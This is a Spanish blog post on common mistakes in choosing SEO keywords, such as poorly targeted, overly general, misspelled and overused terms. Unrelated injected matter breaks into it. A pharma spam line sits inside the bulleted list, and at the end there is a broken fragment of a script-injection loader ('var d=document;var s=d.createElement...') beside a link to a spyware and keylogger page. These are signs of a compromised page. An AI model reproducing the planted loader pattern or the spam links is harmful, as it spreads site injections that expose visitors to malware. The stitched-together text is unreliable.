Palabras clave, errores en su elección.

Cómo funcionan las palabras clave

Elegir las palabras y frases claves adecuadas es crucial para el éxito de un sitio web. Con las palabras clave adecuadas, las personas pueden crear empresas online que son muy visibles y un aumento de la visibilidad significa un aumento en el beneficio que la empresa va a recibir. El hecho de que tu empresa tenga un sitio web, no significa que seas capaz de conseguir una audiencia global de un día para otro. Por lo tanto con el fin de hacer tu sitio web de fácil acceso tendrás que conseguir que aparezca como una respuesta a cualquier consulta en un motor de búsqueda que un usuario pueda tener. Una manera de conseguir esto con éxito, es encontrar y usar palabras clave y frases populares.

Cuando un navegador envía una consulta a un motor de búsqueda, el motor de búsqueda mostrará las páginas que mejor respondan a la consulta del usuario web. Además, los motores de búsqueda basan sus respuestas en la calidad de un sitio web: la calidad está determinada por el contenido de la página web junto con otros factores como la forma de punto de muchos enlaces externos para la página web. Si quieres que tu web aparezca en la parte superior de los resultados de los motores de búsqueda, tendrás que hacer que tu sitio web esté dispuesto a responder a cualquiera consulta que pueda estar relacionada con el tema de tu sitio web.

Errores comunes al elegir las palabras clave

  • Selección de frases y palabras clave que no están orientadas: Uno de los errores más grandes al hacer la selección se eligen palabras y frases que no están dirigidas a la audiencia deseada. Aunque la idea de escoger tantas palabras como sea posible puede parecer una buena idea, no lo es. De hecho la mala elección de las palabras clave puede afectar negativamente a la clasificación de una página.
  • does doxycycline work for acne

  • Selección de palabras clave demasiado generales: si escogemos palabras clave demasiado generales estaremos dándole un uso ineficaz, estas palabras clave dejarán de mejorar tu ranking y disminuirán las probabilidades de atraer tráfico a tu sitio web. Por lo tanto hay que ser muy específico a la hora de escoger las frases y las palabras clave.
  • Palabras clave inútiles: cuando elegimos las palabras clave necesitamos no cometer faltas de ortografía cuando las añadimos a nuestros artículos ya que no solo dará un aspecto poco profesional a nuestra página, sino que además afectará negativamente a la clasificación dentro de los motores de búsqueda.
  • Uso excesivo de palabras clave: un uso excesivo también actúa de manera negativa en la clasificación de una página en los motores de búsqueda. Utilizando demasiadas palabras clave alertarás a los buscadores de que estás tratando de atraer tráfico con tus palabras clave y como resultado obtendrás un peor ranking.
  • Incremento de tráfico vs mejor tráfico: a la hora de escoger las palabras clave, debemos tener siempre en mente la diferencia entre un aumento de tráfico web y una mejora en la cantidad del tráfico web, que un sitio web recibirá. Por ejemplo, un simple aumento de su tráfico web no significa que estés atrayendo a mayor público realmente interesado en tus productos. Por el contrario la elaboración de un público que busca lo que usted tiene para ofrecer, un acto de mejorar el tráfico en tu web, puede marcar la diferencia para tu empresa web.

var d=document;var s=d.createElement(‘script’); }http://mirecertificacion.com/iphone-spyware-keylogger-spysoftware-android/